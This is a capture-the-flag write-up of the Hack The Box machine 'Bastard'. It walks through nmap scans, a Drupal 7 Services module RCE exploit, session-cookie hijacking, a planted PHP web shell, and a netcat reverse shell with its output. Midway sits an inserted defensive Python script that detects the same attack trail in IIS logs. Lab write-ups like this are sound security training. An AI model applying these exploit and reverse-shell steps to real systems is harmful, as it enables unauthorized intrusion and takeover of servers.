Bastard Writeup w/o Metasploit

Reconnaissance

Run the nmapAutomator script to enumerate open ports and services running on those ports.

./nmapAutomator.sh 10.10.10.9 All
  • All: Runs all the scans consecutively.

We get back the following result.

Running all scans on 10.10.10.9

Host is likely running Windows

---------------------Starting Nmap Quick Scan---------------------

Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-16 10:56 EST
Nmap scan report for 10.10.10.9
Host is up (0.043s latency).
Not shown: 997 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
49154/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 6.84 seconds

---------------------Starting Nmap Basic Scan---------------------

Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-16 10:56 EST
Nmap scan report for 10.10.10.9
Host is up (0.038s latency).

PORT      STATE SERVICE VERSION
80/tcp    open  http    Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_  Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
135/tcp   open  msrpc   Microsoft Windows RPC
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 67.32 seconds

----------------------Starting Nmap UDP Scan----------------------

Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-16 10:57 EST
Nmap scan report for 10.10.10.9
Host is up.
All 1000 scanned ports on 10.10.10.9 are open|filtered

Nmap done: 1 IP address (1 host up) scanned in 202.50 seconds

---------------------Starting Nmap Full Scan----------------------

Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-16 11:01 EST
Initiating Parallel DNS resolution of 1 host. at 11:01
Completed Parallel DNS resolution of 1 host. at 11:01, 0.02s elapsed
Initiating SYN Stealth Scan at 11:01
Scanning 10.10.10.9 [65535 ports]
....
Nmap scan report for 10.10.10.9
Host is up (0.045s latency).
Not shown: 65532 filtered ports
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
49154/tcp open  unknown

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 264.79 seconds
           Raw packets sent: 131270 (5.776MB) | Rcvd: 274 (17.620KB)

No new ports

---------------------Starting Nmap Vulns Scan---------------------

Running CVE scan on basic ports

Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-16 11:05 EST
Nmap scan report for 10.10.10.9
Host is up (0.038s latency).

PORT      STATE SERVICE VERSION
80/tcp    open  http    Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
135/tcp   open  msrpc   Microsoft Windows RPC
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 63.13 seconds

Note: The gobuster, nikto and droopescan scans kept timing out. The web server does not seem able to handle the volume of requests these tools send.

We have three open ports.

  • Port 80: running Drupal 7

  • Port 135 & 49154: running Microsoft Windows RPC

Before we move on to enumeration, let’s make some mental notes about the scan results.

  • Port 80 is running Drupal 7 which I know from the Hawk box is vulnerable to a bunch of exploits. Most of these exploits are associated with the modules that are installed on Drupal. Since droopescan is not working, we’ll have to manually figure out if these modules are installed.

Enumeration

Visit the web application in the browser.

It’s running Drupal, which is a free and open-source content management framework. Let’s look at the CHANGELOG to view the exact version.

It’s running Drupal 7.54.

Let’s try and find credentials to this application. I googled “default credentials drupal”, but I didn’t find anything useful. Next, I tried common credentials admin/admin, admin/password, etc. but was not able to log in.

When the target is off-the-shelf software, I usually don’t run a brute-force attack against it because it probably has a lockout policy in place.

Next, run searchsploit.

searchsploit drupal 7

Let’s view vulnerability number 41564.

searchsploit -m 41564

It links to this blog post. It seems to be a deserialization vulnerability that leads to Remote Code Execution (RCE). Looking at the code, we see that it uses the path /rest_endpoint to conduct the exploit.

$url = 'http://vmweb.lan/drupal-7.54';
$endpoint_path = '/rest_endpoint';
$endpoint = 'rest_endpoint';

That path is not found on the box, however, if we simply change it to /rest it works!

So it is using the Services module. We’ll use this exploit to gain an initial foothold on the box.

Initial Foothold

Make the following changes to the exploit code.

$url = '10.10.10.9';
$endpoint_path = '/rest';
$endpoint = 'rest_endpoint';

There are also two comments that are not wrapped properly that you’ll need to fix.

Run the exploit.

php 41564.php

We get an “Uncaught Error: Call to undefined function curl_init()” error message. That’s because we don’t have php-curl installed on our Kali machine.

apt-get install php-curl

Now the exploit should work.

[email protected]:~/Desktop/htb/bastard# php 41564.php
# Exploit Title: Drupal 7.x Services Module Remote Code Execution
# Vendor Homepage: https://www.drupal.org/project/services
# Exploit Author: Charles FOL
# Contact: https://twitter.com/ambionics
# Website: https://www.ambionics.io/blog/drupal-services-module-rce
#!/usr/bin/php
Stored session information in session.json
Stored user information in user.json
Cache contains 7 entries
File written: 10.10.10.9/dixuSOspsOUU.php

Perfect! It created two files: session.json and user.json. View the content of user.json.

[email protected]:~/Desktop/htb/bastard# cat user.json
{
  "uid": "1",
  "name": "admin",
  "mail": "[email protected]",
  "theme": "",
  "created": "1489920428",
  "access": "1581904913",
  "login": 1581908048,
  "status": "1",
  "timezone": "Europe\/Athens",
  "language": "",
  "picture": null,
  "init": "[email protected]",
  "data": false,
  "roles": {
    "2": "authenticated user",
    "3": "administrator"
  },
  "rdf_mapping": {
    "rdftype": [
      "sioc:UserAccount"
    ],
    "name": {
      "predicates": [
        "foaf:name"
      ]
    },
    "homepage": {
      "predicates": [
        "foaf:page"
      ],
      "type": "rel"
    }
  },
  "pass": "$S$DRYKUR0xDeqClnV5W0dnncafeE.Wi4YytNcBmmCtwOjrcH5FJSaE"
}

It gives us the hashed password of the admin user. We could run it through a password cracker, however, we don’t need to because the session.json file gives us a valid session cookie for the admin user.

[email protected]:~/Desktop/htb/bastard# cat session.json
{
  "session_name": "SESSd873f26fc11f2b7e6e4aa0f6fce59913",
  "session_id": "lxPgeAwtaNwwE9BENklEVeWJf5CLaH5NFe5kEwM6_Is",
  "token": "9EsaYcsIlgp7r31F9qG3HJILwA3cbTzSR-61nEB0r_Y"
}

Let’s add the cookie to our browser using the Cookie Manager plugin.

Then refresh the page.

We’re logged in as admin! Click on the Modules tab and check if the PHP filter is enabled. It is. This means we can add PHP code.

Click on Add new content on the welcome page, then click on Basic page. In the Title field enter the value “shell”. In the Body field add the simple PHP shell to upload/execute code from the following link. Make sure to include the “<?php ?>” tags and change the IP address to that of your attack machine. This gives us the ability to both execute commands and upload files. In the Text format field choose the option PHP code. Then hit Save.

In my case the entry created is under the path /node/4. Let’s test it out.

We have code execution! I can’t seem to use PowerShell from here, so what we’ll do is upload netcat to the box and then use it to send a reverse shell back to our attack machine.

Run the systeminfo command.

It’s a 64-bit operating system. Download the 64-bit executable of netcat from here. Start up a python server.

python -m SimpleHTTPServer 7777

Upload it using the fupload parameter.

Then set up a listener on the attack machine.

nc -nlvp 1234

Use the uploaded netcat executable to send a reverse shell to our attack machine.

We get a shell!

[email protected]:~# nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.9] 60572
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\inetpub\drupal-7.54>whoami
whoami
nt authority\iusr

Grab the user.txt flag.
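From the defender's side, the whole chain above leaves a recognisable trail in the IIS access log: a POST to the Services REST endpoint, a request for a randomly named PHP file that Drupal never shipped, and web-shell style query parameters on a node page. The following Python script, added here as an example and not part of the original writeup or the exploit, runs those three checks over a constructed IIS W3C log excerpt; the log lines, the `cmd` parameter name and the netcat file name are assumptions (only `fupload` is taken from the writeup).

```python
from urllib.parse import parse_qs

# Constructed IIS W3C log excerpt modelled on the steps in this writeup (not a real capture).
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip sc-status
2020-02-16 16:09:58 10.10.10.9 GET /CHANGELOG.txt - 80 10.10.14.7 200
2020-02-16 16:10:01 10.10.10.9 POST /rest/user/login - 80 10.10.14.7 200
2020-02-16 16:10:02 10.10.10.9 GET /dixuSOspsOUU.php - 80 10.10.14.7 200
2020-02-16 16:12:40 10.10.10.9 GET /node/4 cmd=systeminfo 80 10.10.14.7 200
2020-02-16 16:13:05 10.10.10.9 GET /node/4 fupload=nc.exe 80 10.10.14.7 200
2020-02-16 16:14:00 10.10.10.9 GET /cron.php - 80 10.10.14.20 200
"""

# Top-level PHP entry points shipped with Drupal 7; any other *.php request in the
# web root is suspicious (the Services exploit dropped a randomly named PHP file there).
DRUPAL7_PHP = {"/index.php", "/cron.php", "/install.php", "/update.php",
               "/xmlrpc.php", "/authorize.php"}
# Query parameters used by the simple PHP shell: "fupload" is from the writeup,
# "cmd" is an assumed name for the command parameter.
SHELL_PARAMS = {"cmd", "fupload"}
REST_ENDPOINT = "/rest/"   # the Services module endpoint found on this box

def parse_iis(text):
    """Yield one dict per W3C record, keyed by the column names in the #Fields line."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))

def analyse(text):
    """Return (client_ip, rule_name, uri) findings in log order."""
    findings = []
    for rec in parse_iis(text):
        stem, query, ip = rec["cs-uri-stem"], rec["cs-uri-query"], rec["c-ip"]
        if rec["cs-method"] == "POST" and stem.startswith(REST_ENDPOINT):
            findings.append((ip, "services_rest_post", stem))
        if stem.lower().endswith(".php") and stem not in DRUPAL7_PHP:
            findings.append((ip, "unknown_php_in_webroot", stem))
        # IIS writes "-" for an empty query string
        if query != "-" and SHELL_PARAMS & set(parse_qs(query, keep_blank_values=True)):
            findings.append((ip, "webshell_parameter", stem + "?" + query))
    return findings

if __name__ == "__main__":
    for ip, rule, uri in analyse(SAMPLE_LOG):
        print(f"{ip:<12} {rule:<24} {uri}")
```

A single REST POST is normal for API clients; it is the combination with an unknown PHP file and shell parameters from the same client that makes the sequence worth an alert.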

Now we need to escalate privileges.

Privilege Escalation

We know from the output of the systeminfo command the OS name and version.

OS Name: Microsoft Windows Server 2008 R2 Datacenter
OS Version: 6.1.7600 N/A Build 7600

The Arctic box was running the same OS, so I used the same exploit, MS10-059, to escalate privileges on this box. I won’t explain it here; please refer to the Arctic writeup.

Grab the root.txt flag.

Lessons Learned

What allowed me to gain initial access to the machine and escalate privileges was exploiting known vulnerabilities that had patches available. So it goes without saying: you should always update your software!